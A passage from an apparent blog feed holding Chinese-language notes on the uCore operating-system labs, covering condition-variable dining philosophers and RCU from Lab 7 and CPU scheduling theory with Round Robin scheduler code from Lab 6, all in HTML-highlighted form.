CODE</span></span><br><span class="line">     <span class="comment">// I am hungry</span></span><br><span class="line">     state_condvar[i]=HUNGRY; <span class="comment">/* 记录下哲学家i饥饿的事实 */</span></span><br><span class="line">     <span class="comment">// try to get fork</span></span><br><span class="line">     <span class="built_in">phi_test_condvar</span>(i);</span><br><span class="line">     <span class="keyword">if</span> (state_condvar[i] != EATING) &#123;</span><br><span class="line">          <span class="built_in">cprintf</span>(<span class="string">&quot;phi_take_forks_condvar: %d didn&#x27;t get fork and will wait\n&quot;</span>,i);</span><br><span class="line">          <span class="built_in">cond_wait</span>(&amp;mtp-&gt;cv[i]);</span><br><span class="line">      &#125;</span><br><span class="line"><span class="comment">//--------leave routine in monitor--------------</span></span><br><span class="line">      <span class="keyword">if</span>(mtp-&gt;next_count&gt;<span class="number">0</span>)</span><br><span class="line">         <span class="built_in">up</span>(&amp;(mtp-&gt;next));</span><br><span class="line">      <span class="keyword">else</span></span><br><span class="line">         <span class="built_in">up</span>(&amp;(mtp-&gt;mutex));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>之后，当哲学家放下刀叉时，如果左右两边的哲学家都满足条件可以进餐，则设置对应的条件变量。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">phi_put_forks_condvar</span><span class="params">(<span class="type">int</span> i)</span> </span>&#123;</span><br><span class="line">     <span class="built_in">down</span>(&amp;(mtp-&gt;mutex));</span><br><span class="line"><span class="comment">//--------into routine in monitor--------------</span></span><br><span class="line">     <span class="comment">// LAB7 EXERCISE1: YOUR CODE</span></span><br><span class="line">     <span class="comment">// I ate over</span></span><br><span class="line">     state_condvar[i]=THINKING; <span class="comment">/* 哲学家进餐结束 */</span></span><br><span class="line">     <span class="comment">// test left and right neighbors</span></span><br><span class="line">     <span class="built_in">phi_test_condvar</span>(LEFT); <span class="comment">/* 看一下左邻居现在是否能进餐 */</span></span><br><span class="line">     <span class="built_in">phi_test_condvar</span>(RIGHT); <span class="comment">/* 看一下右邻居现在是否能进餐 */</span></span><br><span class="line"><span class="comment">//--------leave routine in monitor--------------</span></span><br><span class="line">     <span class="keyword">if</span>(mtp-&gt;next_count&gt;<span class="number">0</span>)</span><br><span class="line">        <span class="built_in">up</span>(&amp;(mtp-&gt;next));</span><br><span class="line">     <span class="keyword">else</span></span><br><span class="line">        <span class="built_in">up</span>(&amp;(mtp-&gt;mutex));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>以下是哲学家尝试进餐的代码</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">phi_test_condvar</span> <span class="params">(i)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(state_condvar[i]==HUNGRY&amp;&amp;state_condvar[LEFT]!=EATING</span><br><span class="line">            &amp;&amp;state_condvar[RIGHT]!=EATING) &#123;</span><br><span class="line">        <span class="built_in">cprintf</span>(<span class="string">&quot;phi_test_condvar: state_condvar[%d] will eating\n&quot;</span>,i);</span><br><span class="line">        state_condvar[i] = EATING ;</span><br><span class="line">        <span class="built_in">cprintf</span>(<span class="string">&quot;phi_test_condvar: signal self_cv[%d] \n&quot;</span>,i);</span><br><span class="line">        <span class="built_in">cond_signal</span>(&amp;mtp-&gt;cv[i]) ;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h3 id="扩展练习">扩展练习</h3><h4 id="Challenge-1">Challenge 1</h4><blockquote><p>在ucore中实现简化的死锁和重入探测机制.</p></blockquote><blockquote><p>在ucore下实现一种探测机制，能够在多进程/线程运行同步互斥问题时，动态判断当前系统是否出现了死锁产生的必要条件，是否产生了多个进程进入临界区的情况。 如果发现，让系统进入monitor状态，打印出你的探测信息。</p></blockquote><p>死锁的相关资料可查阅上文中的<a href="#7-%E6%AD%BB%E9%94%81">死锁</a>来了解。</p><blockquote><p>具体实现暂鸽。</p></blockquote><h4 id="Challenge-2">Challenge 2</h4><blockquote><p>在ucore下实现下Linux的RCU同步互斥机制。</p></blockquote><p>RCU(Read-Copy Update) 机制适用于读者-写者模型，但更适用于<strong>读者多而写者少</strong>的情况，因为其行为方式如下：</p><ul><li><p><strong>随时可以拿到读锁，在有些设计中甚至不需要锁</strong>，即对临界区的读操作随时都可以得到满足，不能被阻塞。因此读者几乎没有什么同步开销。</p></li><li><p>某一时刻只能有一个人拿到写锁，<strong>多个写锁需要互斥</strong>，写的动作包括 拷贝–修改–宽限窗口到期后删除原值。写者在访问它时首先<strong>拷贝</strong>一个副本，然后对副本进行修改，最后使用一个回调（callback）机制在适当的时机把指向原来数据的指针重新指向新的被修改的数据。这个时机就是所有引用该数据的CPU都退出对共享数据的操作。</p><blockquote><p>RCU保护的是指针，这一点尤其重要。因为指针赋值是一条单指令，也就是说是一个原子操作。更改指针指向时没必要考虑它的同步，只需要考虑cache的影响.。</p></blockquote></li><li><p>临界区的原始值为m1，如果存在线程拿到写锁修改了临界区为m2,则在写锁修改临界区<strong>之后</strong>，如果某个线程拿到了读锁，则获取的临界区的值应该为m2；写锁修改临界区<strong>之前</strong>，读锁获取的值应为m1。这样的操作通过原子操作来保证。</p></li><li><p>RCU读操作随时都会得到满足，但写锁之后的写操作所耗费的系统资源就相对比较多了，因为需要延迟数据结构的释放与复制被修改的数据结构，并且只有在宽限期之后才会彻底删除原资源。</p><blockquote><p>当一个线程执行删除某个结点的动作后，该结点并不会马上被删除，而是等待所有读取线程全部读取完成后才进行销毁操作，而这样做的原因是这些线程有可能读到了要删除的元素。</p><p>从删除结点到销毁节点这之间的过程，称为<strong>宽限期</strong>（Grace Period）</p></blockquote></li></ul><blockquote><p>具体实现暂鸽QwQ</p></blockquote>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;简介&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;这里是笔者在完成&lt;code&gt;uCore&lt;/code&gt; Lab 7时写下的一些笔记&lt;/li&gt;
&lt;li&gt;内容涉及信号、管程、死锁和进程通信的一些相关实现。&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    <category term="天问之路" scheme="https://kiprey.github.io/categories/%E5%A4%A9%E9%97%AE%E4%B9%8B%E8%B7%AF/"/>
    
    
    <category term="uCore" scheme="https://kiprey.github.io/tags/uCore/"/>
    
    <category term="OS" scheme="https://kiprey.github.io/tags/OS/"/>
    
  </entry>
  
  <entry>
    <title>uCore实验 - Lab6</title>
    <link href="https://kiprey.github.io/2020/09/uCore-6/"/>
    <id>https://kiprey.github.io/2020/09/uCore-6/</id>
    <published>2020-09-18T09:35:38.000Z</published>
    <updated>2025-11-24T03:59:40.153Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">简介</h2><ul><li>这里是笔者在完成<code>uCore</code> Lab 6时写下的一些笔记</li><li>内容涉及处理机调度的一些相关实现。</li></ul><span id="more"></span><h2 id="知识点">知识点</h2><h3 id="1-CPU资源的时分复用">1. CPU资源的时分复用</h3><ul><li>进程切换：CPU资源的当前占用者切换<ul><li>保存当前进程在PCB中的执行上下文（CPU状态）</li><li>恢复下一个进程的执行上下文</li></ul></li><li>处理机调度<ul><li>从就绪队列中<strong>挑选</strong>下一个占用CPU运行的进程。</li><li>从多个可用CPU中<strong>挑选</strong>就绪进程可使用的CPU资源。</li></ul></li><li>调度程序：挑选就绪进程的内核函数<ul><li>调度策略：依据什么原理挑选进程/线程</li><li>调度时机：什么时候进行调度<ul><li>内核运行调度程序的条件<ul><li>进程从运行状态切换到等待状态</li><li>进程被终结了</li></ul></li><li>非抢占系统：当前进程主动放弃CPU时</li><li>可抢占系统<ul><li>中断请求被服务例程响应完成时</li><li>当前进程被抢占<ul><li>进程的时间片耗尽</li><li>进程从等待状态切换到就绪状态</li></ul></li></ul></li></ul></li></ul></li></ul><h3 id="2-调度准则">2. 调度准则</h3><ul><li><p>比较调度算法的准则</p><ul><li>CPU使用率：CPU处于忙状态的<strong>时间百分比</strong></li><li>吞吐量：单位时间内完成的<strong>进程数量</strong></li><li>周转时间：进程从初始化到结束（包括等待）的<strong>总时间</strong></li><li>等待时间：进程在就绪队列中的<strong>总时间</strong></li><li>响应时间：从提交请求到产生响应所花费的<strong>总时间</strong></li></ul></li><li><p>调度策略的目标</p><ul><li><strong>减少响应时间</strong>：及时处理用户的输入，尽快将输出反馈给用户</li><li><strong>减少平均响应时间的波动</strong>：在交互系统中，可预测性比高差异低平均更重要。</li></ul><blockquote><p>低延迟调度改善用户的交互体验。</p><p>响应时间是操作系统的计算延迟。</p></blockquote></li><li><p>调度策略的吞吐量目标</p><ul><li><strong>增加吞吐量</strong><ul><li>减小开销（例如上下文切换的开销）</li><li>系统资源的高效利用（例如CPU和IO设备的并行使用）</li></ul></li><li><strong>减少每个进程的等待时间</strong></li><li>保证<strong>吞吐量不受用户交互的影响</strong></li></ul><blockquote><p>吞吐量是操作系统的计算带宽。</p></blockquote></li><li><p>调度的公平性目标</p><ul><li>保证每个进程<strong>占用相同的CPU时间</strong></li><li>保证每个进程的<strong>等待时间</strong>相同</li><li>公平通常会增加<strong>平均响应时间</strong></li></ul></li></ul><h3 id="3-调度算法">3. 调度算法</h3><h4 id="a-先来先服务算法（First-Come-First-Served-FCFS）">a. 先来先服务算法（First Come First Served, FCFS）</h4><blockquote><p>依据进程进入就绪状态的先后顺序排序</p></blockquote><ul><li>优点：简单</li><li>缺点：<ul><li><p>平均等待时间波动较大（短进程可能排在长进程后面）</p></li><li><p>IO资源和CPU资源的利用效率可能较低</p><blockquote><p>CPU密集型进程会导致IO设备闲置时，IO密集型进程也在等待。（CPU和IO设备可并行执行）</p></blockquote></li></ul></li></ul><h4 id="b-短进程优先算法（SPN）">b. 短进程优先算法（SPN）</h4><blockquote><p>选择就绪队列中执行时间<strong>最短</strong>进程占用的CPU进入运行状态。就绪队列按预期的执行时间来排序。</p></blockquote><ul><li>优点：短进程优先算法具有<strong>最优</strong>平均周转时间。</li><li>缺点：<ul><li><p>可能导致<strong>饥饿</strong>。例如连续的短进程流会使长进程无法获得CPU资源。</p></li><li><p><strong>需要预估下一个CPU计算的持续时间</strong></p><blockquote><p>一种方法是，用<strong>历史</strong>执行时间预估<strong>未来</strong>执行时间</p></blockquote></li></ul></li></ul><blockquote><p>短剩余时间优先算法（SRT）：SPN算法的可抢占改进</p></blockquote><h4 id="c-最高响应比优先算法（HRRN）">c. 最高响应比优先算法（HRRN）</h4><blockquote><p>选择就绪队列中响应比R值最高的进程</p><p>其中$R=(w+s)/s$, s：执行时间；w：等待时间</p></blockquote><ul><li>在短进程优先算法基础上的改进</li><li>不可抢占</li><li>关注进程的等待时间</li><li>防止无限期推迟</li></ul><h4 id="d-时间片轮转算法（RR，Round-Robin）">d. 时间片轮转算法（RR，Round-Robin）</h4><ul><li>时间片：分配处理机资源的基本时间单位</li><li>算法思路：<ul><li>时间片结束时，按FCFS算法切换到下一个就绪进程。</li><li>每隔n-1个时间片，进程执行一个时间片。</li></ul></li><li>时间片长度选择<ul><li>时间片长度过长，则<strong>等待时间太长</strong>，极端情况下退化成FCFS。</li><li>时间片长度过短，则<strong>反应较为迅速</strong>，但产生大量进程上下文切换，影响系统吞吐量。</li><li>需要选择一个合适的时间片长度，以维持上下文切换开销处于1%状态。</li></ul></li></ul><h4 id="e-多级队列调度算法（MQ）">e. 多级队列调度算法（MQ）</h4><ul><li>就绪队列被划分为多个独立的子队列，每个队列拥有自己的调度策略</li><li>队列间的调度<ul><li><p>固定优先级。例如先处理前台，后处理后台。但可能会导致饥饿。</p></li><li><p>时间片轮转。每个队列都得到一个确定的能够调度其进程的CPU总时间。</p><blockquote><p>例如80%CPU时间用于前台，20%CPU时间用于后台。</p></blockquote></li></ul></li></ul><h4 id="f-多级反馈队列算法（MLFQ）">f. 多级反馈队列算法（MLFQ）</h4><ul><li><p>进程可在不同队列间移动的多级队列算法。</p><blockquote><p>时间片大小随优先级级别的增加而增加。</p><p>例如进程在当前时间片内没有完成，则降到下一个优先级。</p></blockquote></li><li><p>特征：CPU密集型进程优先级下降的很快，IO密集型进程停留在高优先级。</p></li></ul><h4 id="g-公平共享调度（FSS-Fair-Share-Scheduling）">g. 公平共享调度（FSS, Fair Share Scheduling）</h4><p>FSS控制用户对系统资源的访问</p><ul><li>一些用户组比其他用户组更重要。</li><li>保证不重要的组无法垄断资源<ul><li>未使用的资源按比例分配</li><li>没有达到资源使用率目标的组获得更高的优先级。</li></ul></li></ul><h3 id="4-实时操作系统">4. 实时操作系统</h3><ul><li>实时操作系统的定义：正确性依赖于其时间和功能两方面的操作系统</li><li>实时操作系统的性能指标：<ul><li>时间约束的及时性（deadline）</li><li>速度和平均性能相对不重要</li></ul></li><li>实时操作系统的特性：时间约束的<strong>可预测性</strong></li><li>实时任务：<ul><li>任务：一次计算/文件读取/信息传递等等。</li><li>任务属性：完成任务所需的资源以及定时参数。</li></ul></li><li>周期实时任务：一系列相似的任务<ul><li>任务有规律的重复</li><li>周期p = 任务请求间隔$(0&lt;p)$</li><li>执行时间e = 最大执行时间$(0&lt; e &lt;p)$</li><li>使用率$U = e/p$</li></ul></li><li>软时限和硬时限<ul><li>硬时限（hard deadline）<ul><li>错过任务时限将会导致<strong>灾难性或非常严重的后果</strong></li><li><strong>必须</strong>验证，在最坏的情况下能够满足时限</li></ul></li><li>软时限（soft deadline）<ul><li><strong>通常</strong>能满足任务时限。如有时不能满足，则降低要求</li><li>尽力保证满足任务时限。</li></ul></li></ul></li><li>实时调度<ul><li>速率单调调度算法（RM, Rate Monotonic）<ul><li>通过周期安排优先级</li><li>周期越短优先级越高</li><li>执行周期越短的任务。</li></ul></li><li>最早截止时间优先算法（EDF，Earliest Deadline First）<ul><li>截止时间越早优先级越高</li><li>执行截止时间最早的任务</li></ul></li></ul></li></ul><h3 id="5-多处理器调度">5. 多处理器调度</h3><ul><li>多处理器调度的特征<ul><li>多个处理机组成一个多处理系统</li><li>处理机间可负载共享</li></ul></li><li>对称多处理器（SMP，Symmetric multiprocessing）调度<ul><li>每个处理器运行自己的调度程序</li><li>调度程序对共享资源的访问需要进行同步</li></ul></li><li>对称多处理器的进程分配<ul><li>静态进程分配<ul><li>进程从开始到结束都被分配到一个固定的处理机上执行</li><li>每个处理机都有自己的就绪队列</li><li>调度开销小</li><li>各处理机可能忙闲不均（例如<em>一核工作，七核在看</em> XD）</li></ul></li><li>动态进程分配<ul><li>进程在执行中可分配到任意空闲处理机执行</li><li>所有处理机共享一个公共的就绪队列</li><li>调度开销大</li><li>各处理机的负载是均衡的</li></ul></li></ul></li></ul><h3 id="6-优先级反置">6. 优先级反置</h3><blockquote><p>优先级反置（Priority Inversion），是操作系统中出现的<strong>高优先级进程</strong>长时间等待<strong>低优先级进程</strong>所<strong>占用的资源</strong>的现象。</p><p>基于优先级的可抢占调度算法存在优先级反置。</p></blockquote><ul><li>优先级继承（Priority Inheritance）<ul><li>占用资源的<strong>低优先级</strong>进程<strong>继承</strong>申请资源的<strong>高优先级</strong>进程的优先级。</li><li>只在占有资源的低优先级进程<strong>被阻塞时</strong>，才提高占有资源进程的优先级。</li></ul></li><li>优先级天花板协议（Priority ceiling protocol）<ul><li>占用资源进程的优先级和所有可能的申请该资源的进程的最高优先级相同。</li><li>不管是否发生等待，都提升占用资源进程的优先级。</li><li>优先级高于系统中所有被锁定的资源的优先级上限，任务执行临界区时就不会被阻塞。</li></ul></li></ul><h2 id="练习解答">练习解答</h2><h3 id="0-练习0">0) 练习0</h3><blockquote><p>填写已有实验</p></blockquote><p>先将Lab5中的相关代码照搬过来，然后修改<code>alloc_proc</code>的初始化，以及系统中断里的<strong>时钟中断</strong>这两处即可。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">proc_struct</span> * <span class="built_in">alloc_proc</span>(<span class="type">void</span>) &#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *proc = <span class="built_in">kmalloc</span>(<span class="built_in">sizeof</span>(<span class="keyword">struct</span> proc_struct));</span><br><span class="line">    <span class="keyword">if</span> (proc != <span class="literal">NULL</span>) &#123;</span><br><span class="line">        proc-&gt;state = PROC_UNINIT;</span><br><span class="line">        proc-&gt;pid = <span class="number">-1</span>;</span><br><span class="line">        proc-&gt;runs = <span class="number">0</span>;</span><br><span class="line">        proc-&gt;kstack = <span class="number">0</span>;</span><br><span class="line">        proc-&gt;need_resched = <span class="number">0</span>;</span><br><span class="line">        proc-&gt;parent = <span class="literal">NULL</span>;</span><br><span class="line">        proc-&gt;mm = <span class="literal">NULL</span>;</span><br><span class="line">        <span class="built_in">memset</span>(&amp;(proc-&gt;context), <span class="number">0</span>, <span class="built_in">sizeof</span>(<span class="keyword">struct</span> context));</span><br><span class="line">        proc-&gt;tf = <span class="literal">NULL</span>;</span><br><span class="line">        proc-&gt;cr3 = boot_cr3;</span><br><span class="line">        proc-&gt;flags = <span class="number">0</span>;</span><br><span class="line">        <span class="built_in">memset</span>(proc-&gt;name, <span class="number">0</span>, PROC_NAME_LEN);</span><br><span class="line">        <span class="comment">// Lab5 code</span></span><br><span class="line">        proc-&gt;wait_state = <span class="number">0</span>;</span><br><span class="line">        proc-&gt;cptr = proc-&gt;optr = proc-&gt;yptr = <span class="literal">NULL</span>;</span><br><span class="line">        <span class="comment">// Lab6 新增code</span></span><br><span class="line">        proc-&gt;rq = <span class="literal">NULL</span>;</span><br><span class="line">        <span class="built_in">list_init</span>(&amp;(proc-&gt;run_link));</span><br><span class="line">        proc-&gt;time_slice = <span class="number">0</span>;</span><br><span class="line">        proc-&gt;lab6_run_pool.left = proc-&gt;lab6_run_pool.right = proc-&gt;lab6_run_pool.parent = <span class="literal">NULL</span>;</span><br><span class="line">        proc-&gt;lab6_stride = <span class="number">0</span>;</span><br><span class="line">        proc-&gt;lab6_priority = <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> proc;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> IRQ_OFFSET + IRQ_TIMER:</span><br><span class="line">    ticks++;</span><br><span class="line">    <span class="built_in">assert</span>(current != <span class="literal">NULL</span>);</span><br><span class="line">    <span class="built_in">sched_class_proc_tick</span>(current);</span><br><span class="line">    <span class="keyword">break</span>;</span><br></pre></td></tr></table></figure><h3 id="1-练习1">1) 练习1</h3><blockquote><p>使用 Round Robin 调度算法（不需要编码）</p></blockquote><ul><li><p>请理解并分析sched_class中各个函数指针的用法，并结合Round Robin 调度算法描ucore的调度执行过程</p><ul><li><code>sched_class</code>中各个函数指针的用法<ul><li><p><code>sched_class</code>的定义如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// The introduction of scheduling classes is borrrowed from Linux, and makes the</span></span><br><span class="line"><span class="comment">// core scheduler quite extensible. These classes (the scheduler modules) encapsulate</span></span><br><span class="line"><span class="comment">// the scheduling policies.</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">sched_class</span> &#123;</span><br><span class="line">    <span class="comment">// the name of sched_class</span></span><br><span class="line">    <span class="type">const</span> <span class="type">char</span> *name;</span><br><span class="line">    <span class="comment">// Init the run queue</span></span><br><span class="line">    <span class="built_in">void</span> (*init)(<span class="keyword">struct</span> run_queue *rq);</span><br><span class="line">    <span class="comment">// put the proc into runqueue, and this function must be called with rq_lock</span></span><br><span class="line">    <span class="built_in">void</span> (*enqueue)(<span class="keyword">struct</span> run_queue *rq, <span class="keyword">struct</span> proc_struct *proc);</span><br><span class="line">    <span class="comment">// get the proc out runqueue, and this function must be called with rq_lock</span></span><br><span class="line">    <span class="built_in">void</span> (*dequeue)(<span class="keyword">struct</span> run_queue *rq, <span class="keyword">struct</span> proc_struct *proc);</span><br><span class="line">    <span class="comment">// choose the next runnable task</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *(*pick_next)(<span class="keyword">struct</span> run_queue *rq);</span><br><span class="line">    <span class="comment">// dealer of the time-tick</span></span><br><span class="line">    <span class="built_in">void</span> (*proc_tick)(<span class="keyword">struct</span> run_queue *rq, <span class="keyword">struct</span> proc_struct *proc);</span><br><span class="line">    <span class="comment">/* for SMP support in the future</span></span><br><span class="line"><span class="comment">     *  load_balance</span></span><br><span class="line"><span class="comment">     *     void (*load_balance)(struct rq* rq);</span></span><br><span class="line"><span class="comment">     *  get some proc from this rq, used in load_balance,</span></span><br><span class="line"><span class="comment">     *  return value is the num of gotten proc</span></span><br><span class="line"><span class="comment">     *  int (*get_proc)(struct rq* rq, struct proc* procs_moved[]);</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li><li><p>其中，<code>const char *name</code>指向了<strong>当前调度算法的名称</strong>字符串</p></li><li><p><code>void (*init)(struct run_queue *rq)</code>用于<strong>初始化</strong>传入的就绪队列。RR算法中只初始化了对应<code>run_queue</code>的<code>run_list</code>成员。</p></li></ul></li></ul><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">RR_init</span><span class="params">(<span class="keyword">struct</span> run_queue *rq)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">list_init</span>(&amp;(rq-&gt;run_list));</span><br><span class="line">    rq-&gt;proc_num = <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><ul><li><p><code>void (*enqueue)(struct run_queue *rq, struct proc_struct *proc)</code>用于将某个进程<strong>添加</strong>进传入的队列中。RR算法除了将进程添加进队列中，还重置了相关的时间片。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">RR_enqueue</span><span class="params">(<span class="keyword">struct</span> run_queue *rq, <span class="keyword">struct</span> proc_struct *proc)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">assert</span>(<span class="built_in">list_empty</span>(&amp;(proc-&gt;run_link)));</span><br><span class="line">    <span class="built_in">list_add_before</span>(&amp;(rq-&gt;run_list), &amp;(proc-&gt;run_link));</span><br><span class="line">    <span class="keyword">if</span> (proc-&gt;time_slice == <span class="number">0</span> || proc-&gt;time_slice &gt; rq-&gt;max_time_slice) &#123;</span><br><span class="line">        proc-&gt;time_slice = rq-&gt;max_time_slice;</span><br><span class="line">  &#125;</span><br><span class="line">    proc-&gt;rq = rq;</span><br><span class="line">    rq-&gt;proc_num ++;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>void (*dequeue)(struct run_queue *rq, struct proc_struct *proc)</code>用于将某个进程从传入的队列中<strong>移除</strong>。以下是RR算法的实现</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">RR_dequeue</span><span class="params">(<span class="keyword">struct</span> run_queue *rq, <span class="keyword">struct</span> proc_struct *proc)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">assert</span>(!<span class="built_in">list_empty</span>(&amp;(proc-&gt;run_link)) &amp;&amp; proc-&gt;rq == rq);</span><br><span class="line">    <span class="built_in">list_del_init</span>(&amp;(proc-&gt;run_link));</span><br><span class="line">    rq-&gt;proc_num --;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>struct proc_struct *(*pick_next)(struct run_queue *rq)</code>用于在传入的就绪队列中<strong>选择</strong>出一个最适合运行的进程（<strong>选择进程但不将从队列中移除</strong>）。在RR算法中每次都只选择队列最前面那个进程。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *</span><br><span class="line"><span class="built_in">RR_pick_next</span>(<span class="keyword">struct</span> run_queue *rq) &#123;</span><br><span class="line">    <span class="type">list_entry_t</span> *le = <span class="built_in">list_next</span>(&amp;(rq-&gt;run_list));</span><br><span class="line">    <span class="keyword">if</span> (le != &amp;(rq-&gt;run_list)) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">le2proc</span>(le, run_link);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">NULL</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>void (*proc_tick)(struct run_queue *rq, struct proc_struct *proc)</code>。该函数会在时间中断处理例程中被调用，以减小当前运行进程的剩余时间片。若时间片耗尽，则设置当前进程的<code>need_resched</code>为1。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">RR_proc_tick</span><span class="params">(<span class="keyword">struct</span> run_queue *rq, <span class="keyword">struct</span> proc_struct *proc)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (proc-&gt;time_slice &gt; <span class="number">0</span>) &#123;</span><br><span class="line">        proc-&gt;time_slice --;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (proc-&gt;time_slice == <span class="number">0</span>) &#123;</span><br><span class="line">        proc-&gt;need_resched = <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>结合<code>Round Robin</code>调度算法描uCore的调度执行过程</p><ul><li><p>首先，uCore调用<code>sched_init</code>函数用于初始化相关的就绪队列。</p></li><li><p>之后在<code>proc_init</code>函数中，建立第一个内核进程，并将其添加至就绪队列中。</p></li><li><p>当所有的初始化完成后，uCore执行<code>cpu_idle</code>函数，并在其内部的<code>schedule</code>函数中，调用<code>sched_class_enqueue</code>将<strong>当前进程</strong>添加进就绪队列中（因为当前进程要被切换出CPU了）<br>然后，调用<code>sched_class_pick_next</code>获取就绪队列中可被轮换至CPU的进程。如果存在可用的进程，则调用<code>sched_class_dequeue</code>函数，将该进程移出就绪队列，并在之后执行<code>proc_run</code>函数进行进程上下文切换。</p></li><li><p>需要注意的是，每次时间中断都会调用函数<code>sched_class_proc_tick</code>。该函数会减少当前运行进程的剩余时间片。如果时间片减小为0，则设置<code>need_resched</code>为1，并在时间中断例程完成后，在<code>trap</code>函数的剩余代码中进行进程切换。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span 